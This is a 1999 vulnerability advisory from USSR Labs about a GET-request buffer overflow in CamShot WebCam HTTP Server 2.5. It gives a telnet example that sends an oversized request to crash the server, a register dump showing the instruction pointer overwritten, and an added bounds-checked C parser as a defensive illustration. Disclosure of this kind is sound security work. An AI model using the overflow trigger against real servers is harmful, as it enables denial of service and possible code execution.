


CamShot WebCam HTTP Server 2.5 for Win9x buffer overflow vulnerability (Dec.1999)




---------- Forwarded message ----------
From: "Ussr Labs" <labs@ussrback.com>
To: "TECHNOTRONIC" <news@technotronic.com>
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP Server v2.5 for Win9x/NT
Date: Thu, 30 Dec 1999 14:04:14 -0300
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
Server v2.5 for Win9x/NT

USSR Advisory Code:   USSR-99028

Release Date:
December 30, 1999 [4/5]

Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly other versions.

About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages
containing time stamped images captured from a video camera. The images can
be viewed from anywhere on the network with a web browser. CamShot works
with 'Video For Windows' compatible video equipment. Finally a cheap and
simple way to do remote surveillance is here!

THE PROBLEM

UssrLabs found a Local / Remote buffer overflow. The code that handles GET
commands has an unchecked buffer that will allow arbitrary code to be
executed if it is overflowed.

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>

Where (buffer) is approx. 2000 characters. At this point the server overflows.

On the remote machine, someone will see something like this:

CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=0069fa74 CS=017f EIP=61616161 EFLGS=00010246
EBX=0069fa74 SS=0187 ESP=005a0038 EBP=005a0058
ECX=005a00dc DS=0187 ESI=816238f4 FS=33ff
EDX=bff76855 ES=0187 EDI=005a0104 GS=0000
Bytes at CS:EIP:

Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8

Binary or source for this Exploit (when we finish it):

http://www.ussrback.com/

Vendor Status:
Informed.

Vendor   Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm

Credit: USSRLABS

SOLUTION
 Nothing yet.
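
A bounds-checked version of the kind of GET request-line handling the advisory describes as unchecked, given here as an added example (it is not CamShot's code and does not come from USSR Labs or the vendor). The function names, the 255-byte URI limit and the choice of status codes are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define MAX_URI 255 /* assumed limit; the advisory does not state the real buffer size */

/* Parse "GET <uri> HTTP/..." from line_len received bytes (need not be
 * NUL-terminated) and copy the URI into uri[uri_cap].
 * Returns 200 parsed, 400 malformed, 414 URI too long, 501 other method. */
int parse_get_line(const char *line, size_t line_len, char *uri, size_t uri_cap)
{
    const char *p, *end, *sp;
    size_t ulen;

    if (line == NULL || uri == NULL || uri_cap == 0 || line_len < 4)
        return 400;
    uri[0] = '\0';
    if (memcmp(line, "GET ", 4) != 0)
        return 501;
    p = line + 4;
    end = line + line_len;
    /* The URI ends at the next space; the search is bounded by bytes received. */
    sp = memchr(p, ' ', (size_t)(end - p));
    if (sp == NULL || sp == p)
        return 400;
    ulen = (size_t)(sp - p);
    if (ulen >= uri_cap || ulen > MAX_URI)
        return 414; /* reject: never truncate silently, never copy past uri_cap */
    if ((size_t)(end - sp) < 6 || memcmp(sp + 1, "HTTP/", 5) != 0)
        return 400;
    memcpy(uri, p, ulen);
    uri[ulen] = '\0';
    return 200;
}

/* Constructed sample input: "GET " + n x 'a' + " HTTP/1.1". */
int status_for_uri_len(size_t n)
{
    char req[4096], uri[MAX_URI + 1];

    if (n > sizeof req - 16)
        return -1;
    memcpy(req, "GET ", 4);
    memset(req + 4, 'a', n);
    memcpy(req + 4 + n, " HTTP/1.1", 9);
    return parse_get_line(req, 4 + n + 9, uri, sizeof uri);
}
```

With this check in place, a request of the size used in the advisory's example is answered with 414 before any copy into the fixed-size URI buffer takes place.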

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and
Wiretrip.

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com




